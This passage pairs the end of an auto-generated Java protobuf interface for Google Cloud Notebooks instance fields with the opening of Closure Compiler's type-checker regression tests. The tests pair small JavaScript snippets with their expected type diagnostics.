* </pre> * * <code>repeated string instance_owners = 6 [(.google.api.field_behavior) = INPUT_ONLY];</code> * * @param index The index of the value to return. * @return The bytes of the instanceOwners at the given index. */ com.google.protobuf.ByteString getInstanceOwnersBytes(int index); /** * * * <pre> * The service account on this instance, giving access to other Google * Cloud services. * You can use any service account within the same project, but you * must have the service account user permission to use the instance. * * If not specified, the [Compute Engine default service * account](https://cloud.google.com/compute/docs/access/service-accounts#default_service_account) * is used. * </pre> * * <code>string service_account = 7;</code> * * @return The serviceAccount. */ java.lang.String getServiceAccount(); /** * * * <pre> * The service account on this instance, giving access to other Google * Cloud services. * You can use any service account within the same project, but you * must have the service account user permission to use the instance. * * If not specified, the [Compute Engine default service * account](https://cloud.google.com/compute/docs/access/service-accounts#default_service_account) * is used. * </pre> * * <code>string service_account = 7;</code> * * @return The bytes for serviceAccount. */ com.google.protobuf.ByteString getServiceAccountBytes(); /** * * * <pre> * Optional. The URIs of service account scopes to be included in * Compute Engine instances. 
* * If not specified, the following * [scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) * are defined: * - https://www.googleapis.com/auth/cloud-platform * - https://www.googleapis.com/auth/userinfo.email * If not using default scopes, you need at least: * https://www.googleapis.com/auth/compute * </pre> * * <code>repeated string service_account_scopes = 31 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return A list containing the serviceAccountScopes. */ java.util.List<java.lang.String> getServiceAccountScopesList(); /** * * * <pre> * Optional. The URIs of service account scopes to be included in * Compute Engine instances. * * If not specified, the following * [scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) * are defined: * - https://www.googleapis.com/auth/cloud-platform * - https://www.googleapis.com/auth/userinfo.email * If not using default scopes, you need at least: * https://www.googleapis.com/auth/compute * </pre> * * <code>repeated string service_account_scopes = 31 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The count of serviceAccountScopes. */ int getServiceAccountScopesCount(); /** * * * <pre> * Optional. The URIs of service account scopes to be included in * Compute Engine instances. * * If not specified, the following * [scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) * are defined: * - https://www.googleapis.com/auth/cloud-platform * - https://www.googleapis.com/auth/userinfo.email * If not using default scopes, you need at least: * https://www.googleapis.com/auth/compute * </pre> * * <code>repeated string service_account_scopes = 31 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @param index The index of the element to return. * @return The serviceAccountScopes at the given index. */ java.lang.String getServiceAccountScopes(int index); /** * * * <pre> * Optional. 
The URIs of service account scopes to be included in * Compute Engine instances. * * If not specified, the following * [scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) * are defined: * - https://www.googleapis.com/auth/cloud-platform * - https://www.googleapis.com/auth/userinfo.email * If not using default scopes, you need at least: * https://www.googleapis.com/auth/compute * </pre> * * <code>repeated string service_account_scopes = 31 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @param index The index of the value to return. * @return The bytes of the serviceAccountScopes at the given index. */ com.google.protobuf.ByteString getServiceAccountScopesBytes(int index); /** * * * <pre> * Required. The [Compute Engine machine * type](https://cloud.google.com/compute/docs/machine-types) of this * instance. * </pre> * * <code>string machine_type = 8 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The machineType. */ java.lang.String getMachineType(); /** * * * <pre> * Required. The [Compute Engine machine * type](https://cloud.google.com/compute/docs/machine-types) of this * instance. * </pre> * * <code>string machine_type = 8 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The bytes for machineType. */ com.google.protobuf.ByteString getMachineTypeBytes(); /** * * * <pre> * The hardware accelerator used on this instance. If you use * accelerators, make sure that your configuration has * [enough vCPUs and memory to support the `machine_type` you have * selected](https://cloud.google.com/compute/docs/gpus/#gpus-list). * </pre> * * <code>.google.cloud.notebooks.v1.Instance.AcceleratorConfig accelerator_config = 9;</code> * * @return Whether the acceleratorConfig field is set. */ boolean hasAcceleratorConfig(); /** * * * <pre> * The hardware accelerator used on this instance. 
If you use * accelerators, make sure that your configuration has * [enough vCPUs and memory to support the `machine_type` you have * selected](https://cloud.google.com/compute/docs/gpus/#gpus-list). * </pre> * * <code>.google.cloud.notebooks.v1.Instance.AcceleratorConfig accelerator_config = 9;</code> * * @return The acceleratorConfig. */ com.google.cloud.notebooks.v1.Instance.AcceleratorConfig getAcceleratorConfig(); /** * * * <pre> * The hardware accelerator used on this instance. If you use * accelerators, make sure that your configuration has * [enough vCPUs and memory to support the `machine_type` you have * selected](https://cloud.google.com/compute/docs/gpus/#gpus-list). * </pre> * * <code>.google.cloud.notebooks.v1.Instance.AcceleratorConfig accelerator_config = 9;</code> */ com.google.cloud.notebooks.v1.Instance.AcceleratorConfigOrBuilder getAcceleratorConfigOrBuilder(); /** * * * <pre> * Output only. The state of this instance. * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.State state = 10 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> * * @return The enum numeric value on the wire for state. */ int getStateValue(); /** * * * <pre> * Output only. The state of this instance. * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.State state = 10 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> * * @return The state. */ com.google.cloud.notebooks.v1.Instance.State getState(); /** * * * <pre> * Whether the end user authorizes Google Cloud to install GPU driver * on this instance. * If this field is empty or set to false, the GPU driver won't be installed. * Only applicable to instances with GPUs. * </pre> * * <code>bool install_gpu_driver = 11;</code> * * @return The installGpuDriver. */ boolean getInstallGpuDriver(); /** * * * <pre> * Specify a custom Cloud Storage path where the GPU driver is stored. * If not specified, we'll automatically choose from official GPU drivers. 
* </pre> * * <code>string custom_gpu_driver_path = 12;</code> * * @return The customGpuDriverPath. */ java.lang.String getCustomGpuDriverPath(); /** * * * <pre> * Specify a custom Cloud Storage path where the GPU driver is stored. * If not specified, we'll automatically choose from official GPU drivers. * </pre> * * <code>string custom_gpu_driver_path = 12;</code> * * @return The bytes for customGpuDriverPath. */ com.google.protobuf.ByteString getCustomGpuDriverPathBytes(); /** * * * <pre> * Input only. The type of the boot disk attached to this instance, defaults to * standard persistent disk (`PD_STANDARD`). * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.DiskType boot_disk_type = 13 [(.google.api.field_behavior) = INPUT_ONLY]; * </code> * * @return The enum numeric value on the wire for bootDiskType. */ int getBootDiskTypeValue(); /** * * * <pre> * Input only. The type of the boot disk attached to this instance, defaults to * standard persistent disk (`PD_STANDARD`). * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.DiskType boot_disk_type = 13 [(.google.api.field_behavior) = INPUT_ONLY]; * </code> * * @return The bootDiskType. */ com.google.cloud.notebooks.v1.Instance.DiskType getBootDiskType(); /** * * * <pre> * Input only. The size of the boot disk in GB attached to this instance, up to a maximum * of 64000 GB (64 TB). The minimum recommended value is 100 GB. If not * specified, this defaults to 100. * </pre> * * <code>int64 boot_disk_size_gb = 14 [(.google.api.field_behavior) = INPUT_ONLY];</code> * * @return The bootDiskSizeGb. */ long getBootDiskSizeGb(); /** * * * <pre> * Input only. The type of the data disk attached to this instance, defaults to * standard persistent disk (`PD_STANDARD`). * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.DiskType data_disk_type = 25 [(.google.api.field_behavior) = INPUT_ONLY]; * </code> * * @return The enum numeric value on the wire for dataDiskType. 
*/ int getDataDiskTypeValue(); /** * * * <pre> * Input only. The type of the data disk attached to this instance, defaults to * standard persistent disk (`PD_STANDARD`). * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.DiskType data_disk_type = 25 [(.google.api.field_behavior) = INPUT_ONLY]; * </code> * * @return The dataDiskType. */ com.google.cloud.notebooks.v1.Instance.DiskType getDataDiskType(); /** * * * <pre> * Input only. The size of the data disk in GB attached to this instance, up to a maximum * of 64000 GB (64 TB). You can choose the size of the data disk based on how * big your notebooks and data are. If not specified, this defaults to 100. * </pre> * * <code>int64 data_disk_size_gb = 26 [(.google.api.field_behavior) = INPUT_ONLY];</code> * * @return The dataDiskSizeGb. */ long getDataDiskSizeGb(); /** * * * <pre> * Input only. If true, the data disk will not be auto deleted when deleting the instance. * </pre> * * <code>bool no_remove_data_disk = 27 [(.google.api.field_behavior) = INPUT_ONLY];</code> * * @return The noRemoveDataDisk. */ boolean getNoRemoveDataDisk(); /** * * * <pre> * Input only. Disk encryption method used on the boot and data disks, defaults to GMEK. * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.DiskEncryption disk_encryption = 15 [(.google.api.field_behavior) = INPUT_ONLY]; * </code> * * @return The enum numeric value on the wire for diskEncryption. */ int getDiskEncryptionValue(); /** * * * <pre> * Input only. Disk encryption method used on the boot and data disks, defaults to GMEK. * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.DiskEncryption disk_encryption = 15 [(.google.api.field_behavior) = INPUT_ONLY]; * </code> * * @return The diskEncryption. */ com.google.cloud.notebooks.v1.Instance.DiskEncryption getDiskEncryption(); /** * * * <pre> * Input only. The KMS key used to encrypt the disks, only applicable if disk_encryption * is CMEK. 
* Format: * `projects/{project_id}/locations/{location}/keyRings/{key_ring_id}/cryptoKeys/{key_id}` * * Learn more about [using your own encryption keys](/kms/docs/quickstart). * </pre> * * <code>string kms_key = 16 [(.google.api.field_behavior) = INPUT_ONLY];</code> * * @return The kmsKey. */ java.lang.String getKmsKey(); /** * * * <pre> * Input only. The KMS key used to encrypt the disks, only applicable if disk_encryption * is CMEK. * Format: * `projects/{project_id}/locations/{location}/keyRings/{key_ring_id}/cryptoKeys/{key_id}` * * Learn more about [using your own encryption keys](/kms/docs/quickstart). * </pre> * * <code>string kms_key = 16 [(.google.api.field_behavior) = INPUT_ONLY];</code> * * @return The bytes for kmsKey. */ com.google.protobuf.ByteString getKmsKeyBytes(); /** * * * <pre> * Output only. Attached disks to notebook instance. * </pre> * * <code> * repeated .google.cloud.notebooks.v1.Instance.Disk disks = 28 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> */ java.util.List<com.google.cloud.notebooks.v1.Instance.Disk> getDisksList(); /** * * * <pre> * Output only. Attached disks to notebook instance. * </pre> * * <code> * repeated .google.cloud.notebooks.v1.Instance.Disk disks = 28 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> */ com.google.cloud.notebooks.v1.Instance.Disk getDisks(int index); /** * * * <pre> * Output only. Attached disks to notebook instance. * </pre> * * <code> * repeated .google.cloud.notebooks.v1.Instance.Disk disks = 28 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> */ int getDisksCount(); /** * * * <pre> * Output only. Attached disks to notebook instance. * </pre> * * <code> * repeated .google.cloud.notebooks.v1.Instance.Disk disks = 28 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> */ java.util.List<? extends com.google.cloud.notebooks.v1.Instance.DiskOrBuilder> getDisksOrBuilderList(); /** * * * <pre> * Output only. Attached disks to notebook instance. 
* </pre> * * <code> * repeated .google.cloud.notebooks.v1.Instance.Disk disks = 28 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> */ com.google.cloud.notebooks.v1.Instance.DiskOrBuilder getDisksOrBuilder(int index); /** * * * <pre> * Optional. Shielded VM configuration. * [Images using supported Shielded VM * features](https://cloud.google.com/compute/docs/instances/modifying-shielded-vm). * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.ShieldedInstanceConfig shielded_instance_config = 30 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return Whether the shieldedInstanceConfig field is set. */ boolean hasShieldedInstanceConfig(); /** * * * <pre> * Optional. Shielded VM configuration. * [Images using supported Shielded VM * features](https://cloud.google.com/compute/docs/instances/modifying-shielded-vm). * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.ShieldedInstanceConfig shielded_instance_config = 30 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The shieldedInstanceConfig. */ com.google.cloud.notebooks.v1.Instance.ShieldedInstanceConfig getShieldedInstanceConfig(); /** * * * <pre> * Optional. Shielded VM configuration. * [Images using supported Shielded VM * features](https://cloud.google.com/compute/docs/instances/modifying-shielded-vm). * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.ShieldedInstanceConfig shielded_instance_config = 30 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ com.google.cloud.notebooks.v1.Instance.ShieldedInstanceConfigOrBuilder getShieldedInstanceConfigOrBuilder(); /** * * * <pre> * If true, no public IP will be assigned to this instance. * </pre> * * <code>bool no_public_ip = 17;</code> * * @return The noPublicIp. */ boolean getNoPublicIp(); /** * * * <pre> * If true, the notebook instance will not register with the proxy. * </pre> * * <code>bool no_proxy_access = 18;</code> * * @return The noProxyAccess. 
*/ boolean getNoProxyAccess(); /** * * * <pre> * The name of the VPC that this instance is in. * Format: * `projects/{project_id}/global/networks/{network_id}` * </pre> * * <code>string network = 19;</code> * * @return The network. */ java.lang.String getNetwork(); /** * * * <pre> * The name of the VPC that this instance is in. * Format: * `projects/{project_id}/global/networks/{network_id}` * </pre> * * <code>string network = 19;</code> * * @return The bytes for network. */ com.google.protobuf.ByteString getNetworkBytes(); /** * * * <pre> * The name of the subnet that this instance is in. * Format: * `projects/{project_id}/regions/{region}/subnetworks/{subnetwork_id}` * </pre> * * <code>string subnet = 20;</code> * * @return The subnet. */ java.lang.String getSubnet(); /** * * * <pre> * The name of the subnet that this instance is in. * Format: * `projects/{project_id}/regions/{region}/subnetworks/{subnetwork_id}` * </pre> * * <code>string subnet = 20;</code> * * @return The bytes for subnet. */ com.google.protobuf.ByteString getSubnetBytes(); /** * * * <pre> * Labels to apply to this instance. * These can be later modified by the setLabels method. * </pre> * * <code>map&lt;string, string&gt; labels = 21;</code> */ int getLabelsCount(); /** * * * <pre> * Labels to apply to this instance. * These can be later modified by the setLabels method. * </pre> * * <code>map&lt;string, string&gt; labels = 21;</code> */ boolean containsLabels(java.lang.String key); /** Use {@link #getLabelsMap()} instead. */ @java.lang.Deprecated java.util.Map<java.lang.String, java.lang.String> getLabels(); /** * * * <pre> * Labels to apply to this instance. * These can be later modified by the setLabels method. * </pre> * * <code>map&lt;string, string&gt; labels = 21;</code> */ java.util.Map<java.lang.String, java.lang.String> getLabelsMap(); /** * * * <pre> * Labels to apply to this instance. * These can be later modified by the setLabels method. 
* </pre> * * <code>map&lt;string, string&gt; labels = 21;</code> */ /* nullable */ java.lang.String getLabelsOrDefault( java.lang.String key, /* nullable */ java.lang.String defaultValue); /** * * * <pre> * Labels to apply to this instance. * These can be later modified by the setLabels method. * </pre> * * <code>map&lt;string, string&gt; labels = 21;</code> */ java.lang.String getLabelsOrThrow(java.lang.String key); /** * * * <pre> * Custom metadata to apply to this instance. * </pre> * * <code>map&lt;string, string&gt; metadata = 22;</code> */ int getMetadataCount(); /** * * * <pre> * Custom metadata to apply to this instance. * </pre> * * <code>map&lt;string, string&gt; metadata = 22;</code> */ boolean containsMetadata(java.lang.String key); /** Use {@link #getMetadataMap()} instead. */ @java.lang.Deprecated java.util.Map<java.lang.String, java.lang.String> getMetadata(); /** * * * <pre> * Custom metadata to apply to this instance. * </pre> * * <code>map&lt;string, string&gt; metadata = 22;</code> */ java.util.Map<java.lang.String, java.lang.String> getMetadataMap(); /** * * * <pre> * Custom metadata to apply to this instance. * </pre> * * <code>map&lt;string, string&gt; metadata = 22;</code> */ /* nullable */ java.lang.String getMetadataOrDefault( java.lang.String key, /* nullable */ java.lang.String defaultValue); /** * * * <pre> * Custom metadata to apply to this instance. * </pre> * * <code>map&lt;string, string&gt; metadata = 22;</code> */ java.lang.String getMetadataOrThrow(java.lang.String key); /** * * * <pre> * Optional. The Compute Engine tags to add to runtime (see [Tagging * instances](https://cloud.google.com/compute/docs/label-or-tag-resources#tags)). * </pre> * * <code>repeated string tags = 32 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return A list containing the tags. */ java.util.List<java.lang.String> getTagsList(); /** * * * <pre> * Optional. 
The Compute Engine tags to add to runtime (see [Tagging * instances](https://cloud.google.com/compute/docs/label-or-tag-resources#tags)). * </pre> * * <code>repeated string tags = 32 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The count of tags. */ int getTagsCount(); /** * * * <pre> * Optional. The Compute Engine tags to add to runtime (see [Tagging * instances](https://cloud.google.com/compute/docs/label-or-tag-resources#tags)). * </pre> * * <code>repeated string tags = 32 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param index The index of the element to return. * @return The tags at the given index. */ java.lang.String getTags(int index); /** * * * <pre> * Optional. The Compute Engine tags to add to runtime (see [Tagging * instances](https://cloud.google.com/compute/docs/label-or-tag-resources#tags)). * </pre> * * <code>repeated string tags = 32 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param index The index of the value to return. * @return The bytes of the tags at the given index. */ com.google.protobuf.ByteString getTagsBytes(int index); /** * * * <pre> * The upgrade history of this instance. * </pre> * * <code>repeated .google.cloud.notebooks.v1.Instance.UpgradeHistoryEntry upgrade_history = 29; * </code> */ java.util.List<com.google.cloud.notebooks.v1.Instance.UpgradeHistoryEntry> getUpgradeHistoryList(); /** * * * <pre> * The upgrade history of this instance. * </pre> * * <code>repeated .google.cloud.notebooks.v1.Instance.UpgradeHistoryEntry upgrade_history = 29; * </code> */ com.google.cloud.notebooks.v1.Instance.UpgradeHistoryEntry getUpgradeHistory(int index); /** * * * <pre> * The upgrade history of this instance. * </pre> * * <code>repeated .google.cloud.notebooks.v1.Instance.UpgradeHistoryEntry upgrade_history = 29; * </code> */ int getUpgradeHistoryCount(); /** * * * <pre> * The upgrade history of this instance. 
* </pre> * * <code>repeated .google.cloud.notebooks.v1.Instance.UpgradeHistoryEntry upgrade_history = 29; * </code> */ java.util.List<? extends com.google.cloud.notebooks.v1.Instance.UpgradeHistoryEntryOrBuilder> getUpgradeHistoryOrBuilderList(); /** * * * <pre> * The upgrade history of this instance. * </pre> * * <code>repeated .google.cloud.notebooks.v1.Instance.UpgradeHistoryEntry upgrade_history = 29; * </code> */ com.google.cloud.notebooks.v1.Instance.UpgradeHistoryEntryOrBuilder getUpgradeHistoryOrBuilder( int index); /** * * * <pre> * Optional. The type of vNIC to be used on this interface. This may be gVNIC or * VirtioNet. * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.NicType nic_type = 33 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The enum numeric value on the wire for nicType. */ int getNicTypeValue(); /** * * * <pre> * Optional. The type of vNIC to be used on this interface. This may be gVNIC or * VirtioNet. * </pre> * * <code> * .google.cloud.notebooks.v1.Instance.NicType nic_type = 33 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The nicType. */ com.google.cloud.notebooks.v1.Instance.NicType getNicType(); /** * * * <pre> * Optional. The optional reservation affinity. Setting this field will apply * the specified [Zonal Compute * Reservation](https://cloud.google.com/compute/docs/instances/reserving-zonal-resources) * to this notebook instance. * </pre> * * <code> * .google.cloud.notebooks.v1.ReservationAffinity reservation_affinity = 34 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return Whether the reservationAffinity field is set. */ boolean hasReservationAffinity(); /** * * * <pre> * Optional. The optional reservation affinity. Setting this field will apply * the specified [Zonal Compute * Reservation](https://cloud.google.com/compute/docs/instances/reserving-zonal-resources) * to this notebook instance. 
* </pre> * * <code> * .google.cloud.notebooks.v1.ReservationAffinity reservation_affinity = 34 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The reservationAffinity. */ com.google.cloud.notebooks.v1.ReservationAffinity getReservationAffinity(); /** * * * <pre> * Optional. The optional reservation affinity. Setting this field will apply * the specified [Zonal Compute * Reservation](https://cloud.google.com/compute/docs/instances/reserving-zonal-resources) * to this notebook instance. * </pre> * * <code> * .google.cloud.notebooks.v1.ReservationAffinity reservation_affinity = 34 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ com.google.cloud.notebooks.v1.ReservationAffinityOrBuilder getReservationAffinityOrBuilder(); /** * * * <pre> * Output only. Email address of entity that sent original CreateInstance request. * </pre> * * <code>string creator = 36 [(.google.api.field_behavior) = OUTPUT_ONLY];</code> * * @return The creator. */ java.lang.String getCreator(); /** * * * <pre> * Output only. Email address of entity that sent original CreateInstance request. * </pre> * * <code>string creator = 36 [(.google.api.field_behavior) = OUTPUT_ONLY];</code> * * @return The bytes for creator. */ com.google.protobuf.ByteString getCreatorBytes(); /** * * * <pre> * Optional. Flag to enable ip forwarding or not, default false/off. * https://cloud.google.com/vpc/docs/using-routes#canipforward * </pre> * * <code>bool can_ip_forward = 39 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The canIpForward. */ boolean getCanIpForward(); /** * * * <pre> * Output only. Instance creation time. * </pre> * * <code>.google.protobuf.Timestamp create_time = 23 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> * * @return Whether the createTime field is set. */ boolean hasCreateTime(); /** * * * <pre> * Output only. Instance creation time. 
* </pre> * * <code>.google.protobuf.Timestamp create_time = 23 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> * * @return The createTime. */ com.google.protobuf.Timestamp getCreateTime(); /** * * * <pre> * Output only. Instance creation time. * </pre> * * <code>.google.protobuf.Timestamp create_time = 23 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> */ com.google.protobuf.TimestampOrBuilder getCreateTimeOrBuilder(); /** * * * <pre> * Output only. Instance update time. * </pre> * * <code>.google.protobuf.Timestamp update_time = 24 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> * * @return Whether the updateTime field is set. */ boolean hasUpdateTime(); /** * * * <pre> * Output only. Instance update time. * </pre> * * <code>.google.protobuf.Timestamp update_time = 24 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> * * @return The updateTime. */ com.google.protobuf.Timestamp getUpdateTime(); /** * * * <pre> * Output only. Instance update time. * </pre> * * <code>.google.protobuf.Timestamp update_time = 24 [(.google.api.field_behavior) = OUTPUT_ONLY]; * </code> */ com.google.protobuf.TimestampOrBuilder getUpdateTimeOrBuilder(); com.google.cloud.notebooks.v1.Instance.EnvironmentCase getEnvironmentCase(); }
google/closure-compiler
35,032
test/com/google/javascript/jscomp/TypeCheckBugsAndIssuesTest.java
/* * Copyright 2006 The Closure Compiler Authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.javascript.jscomp; import static com.google.javascript.jscomp.TypeCheck.POSSIBLE_INEXISTENT_PROPERTY_EXPLANATION; import static com.google.javascript.jscomp.TypeCheckTestCase.TypeTestBuilder.newTest; import com.google.javascript.jscomp.testing.TestExternsBuilder; import org.junit.Test; import org.junit.runner.RunWith; import org.junit.runners.JUnit4; /** Tests {@link TypeCheck}. */ @RunWith(JUnit4.class) public final class TypeCheckBugsAndIssuesTest { @Test public void testIssue61a() { newTest() .addSource( """ var ns = {}; (function() { /** @param {string} b */ ns.a = function(b) {}; })(); function d() { ns.a(123); } """) .addDiagnostic( """ actual parameter 1 of ns.a does not match formal parameter found : number required: string """) .suppress(DiagnosticGroups.STRICT_MISSING_PROPERTIES) .run(); } @Test public void testIssue61b() { newTest() .addSource( """ /** @const */ var ns = {}; (function() { /** @param {string} b */ ns.a = function(b) {}; })(); ns.a(123); """) .addDiagnostic( """ actual parameter 1 of ns.a does not match formal parameter found : number required: string """) .run(); } @Test public void testIssue61c() { newTest() .addSource( """ var ns = {}; (function() { /** @param {string} b */ ns.a = function(b) {}; })(); ns.a(123); """) .addDiagnostic( """ actual parameter 1 of ns.a does not match formal parameter found : number required: string """) 
.run(); } @Test public void testIssue86() { newTest() .addSource( """ /** @interface */ function I() {} /** @return {number} */ I.prototype.get = function(){}; /** @constructor\s * @implements {I} */ function F() {} /** @override */ F.prototype.get = function() { return true; }; """) .addDiagnostic( """ inconsistent return type found : boolean required: number """) .run(); } @Test public void testIssue124() { newTest() .addSource( """ var t = null; function test() { if (t != null) { t = null; } t = 1; } """) .run(); } @Test public void testIssue124b() { newTest() .addSource( """ var t = null; function test() { if (t != null) { t = null; } t = undefined; } """) .addDiagnostic( """ condition always evaluates to false left : (null|undefined) right: null """) .run(); } @Test public void testIssue259() { newTest() .addSource( """ /** @param {number} x */ function f(x) {} /** @constructor */ var Clock = function() { /** @constructor */ this.Date = function() {}; f(new this.Date()); }; """) .addDiagnostic( """ actual parameter 1 of f does not match formal parameter found : this.Date required: number """) .run(); } @Test public void testIssue301() { newTest() .addExterns(new TestExternsBuilder().addString().addArray().build()) .addSource( """ Array.indexOf = function() {}; var s = 'hello'; alert(s.toLowerCase.indexOf('1')); """) .addDiagnostic("Property indexOf never defined on String.prototype.toLowerCase") .run(); } @Test public void testIssue368() { newTest() .addSource( """ /** @constructor */ function Foo(){} /** * @param {number} one * @param {string} two */ Foo.prototype.add = function(one, two) {}; /** * @constructor * @extends {Foo} */ function Bar(){} /** @override */ Bar.prototype.add = function(ignored) {}; (new Bar()).add(1, 2); """) .addDiagnostic( """ actual parameter 2 of Bar.prototype.add does not match formal parameter found : number required: string """) .run(); } @Test public void testIssue380() { newTest() .addExterns(new 
TestExternsBuilder().addArray().addObject().build()) .addSource( """ /** @type { function(string): {innerHTML: string} } */ document.getElementById; var list = /** @type {!Array<string>} */ ['hello', 'you']; list.push('?'); document.getElementById('node').innerHTML = list.toString(); """) .run(); } @Test public void testIssue483() { newTest() .addExterns(new TestExternsBuilder().addArray().build()) .addSource( """ /** @constructor */ function C() { /** @type {?Array} */ this.a = []; } C.prototype.f = function() { if (this.a.length > 0) { g(this.a); } }; /** @param {number} a */ function g(a) {} """) .addDiagnostic( """ actual parameter 1 of g does not match formal parameter found : Array required: number """) .run(); } @Test public void testIssue537a() { newTest() .addSource( """ /** @constructor */ function Foo() {} Foo.prototype = {method: function() {}}; /** * @constructor * @extends {Foo} */ function Bar() { Foo.call(this); if (this.baz()) this.method(1); } Bar.prototype = { baz: function() { return true; } }; Bar.prototype.__proto__ = Foo.prototype; """) .addDiagnostic( """ Function Foo.prototype.method: called with 1 argument(s). \ Function requires at least 0 argument(s) and no more than 0 argument(s). """) .includeDefaultExterns() .run(); } @Test public void testIssue537b() { newTest() .addSource( """ /** @constructor */ function Foo() {} Foo.prototype = {method: function() {}}; /** * @constructor * @extends {Foo} */ function Bar() { Foo.call(this); if (this.baz(1)) this.method(); } Bar.prototype = { baz: function() { return true; } }; Bar.prototype.__proto__ = Foo.prototype; """) .addDiagnostic( """ Function Bar.prototype.baz: called with 1 argument(s). \ Function requires at least 0 argument(s) and no more than 0 argument(s). 
""") .includeDefaultExterns() .run(); } @Test public void testIssue537c() { newTest() .addSource( """ /** @constructor */ function Foo() {} /** * @constructor * @extends {Foo} */ function Bar() { Foo.call(this); if (this.baz2()) alert(1); } Bar.prototype = { baz: function() { return true; } }; Bar.prototype.__proto__ = Foo.prototype; """) .addDiagnostic("Property baz2 never defined on Bar") .includeDefaultExterns() .run(); } @Test public void testIssue537d() { newTest() .addSource( """ /** @constructor */ function Foo() {} Foo.prototype = { /** @return {Bar} */ x: function() { new Bar(); }, /** @return {Foo} */ y: function() { new Bar(); } }; /** * @constructor * @extends {Foo} */ function Bar() { this.xy = 3; } /** @return {Bar} */ function f() { return new Bar(); } /** @return {Foo} */ function g() { return new Bar(); } Bar.prototype = { /** @override @return {Bar} */ x: function() { new Bar(); }, /** @override @return {Foo} */ y: function() { new Bar(); } }; Bar.prototype.__proto__ = Foo.prototype; """) .includeDefaultExterns() .run(); } @Test public void testIssue586() { newTest() .addSource( """ /** @constructor */ var MyClass = function() {}; /** @param {boolean} success */ MyClass.prototype.fn = function(success) {}; MyClass.prototype.test = function() { this.fn(); this.fn = function() {}; }; """) .addDiagnostic( """ Function MyClass.prototype.fn: called with 0 argument(s). \ Function requires at least 1 argument(s) and no more than 1 argument(s). """) .run(); } @Test public void testIssue635() { // TODO(nicksantos): Make this emit a warning, because of the 'this' type. 
newTest() .addSource( """ /** @constructor */ function F() {} F.prototype.bar = function() { this.baz(); }; F.prototype.baz = function() {}; /** @constructor */ function G() {} G.prototype.bar = F.prototype.bar; """) .run(); } @Test public void testIssue635b() { newTest() .addSource( """ /** @constructor */ function F() {} /** @constructor */ function G() {} /** @type {function(new:G)} */ var x = F; """) .addDiagnostic( """ initializing variable found : (typeof F) required: function(new:G): ? """) .run(); } @Test public void testIssue669() { newTest() .addSource( """ /** @return {{prop1: (Object|undefined)}} */ function f(a) { var results; if (a) { results = {}; results.prop1 = {a: 3}; } else { results = {prop2: 3}; } return results; } """) .run(); } @Test public void testIssue688() { newTest() .addSource( """ /** @const */ var SOME_DEFAULT = /** @type {TwoNumbers} */ ({first: 1, second: 2}); /** * Class defining an interface with two numbers. * @interface */ function TwoNumbers() {} /** @type {number} */ TwoNumbers.prototype.first; /** @type {number} */ TwoNumbers.prototype.second; /** @return {number} */ function f() { return SOME_DEFAULT; } """) .addDiagnostic( """ inconsistent return type found : (TwoNumbers|null) required: number """) .run(); } @Test public void testIssue700() { newTest() .addSource( """ /** * @param {{text: string}} opt_data * @return {string} */ function temp1(opt_data) { return opt_data.text; } /** * @param {{activity: (boolean|number|string|null|Object)}} opt_data * @return {string} */ function temp2(opt_data) { /** @suppress {checkTypes} */ function __inner() { return temp1(opt_data.activity); } return __inner(); } /** * @param {{n: number, text: string, b: boolean}} opt_data * @return {string} */ function temp3(opt_data) { return 'n: ' + opt_data.n + ', t: ' + opt_data.text + '.'; } function callee() { var output = temp3({ n: 0, text: 'a string', b: true }) alert(output); } callee(); """) .run(); } @Test public void testIssue725() { 
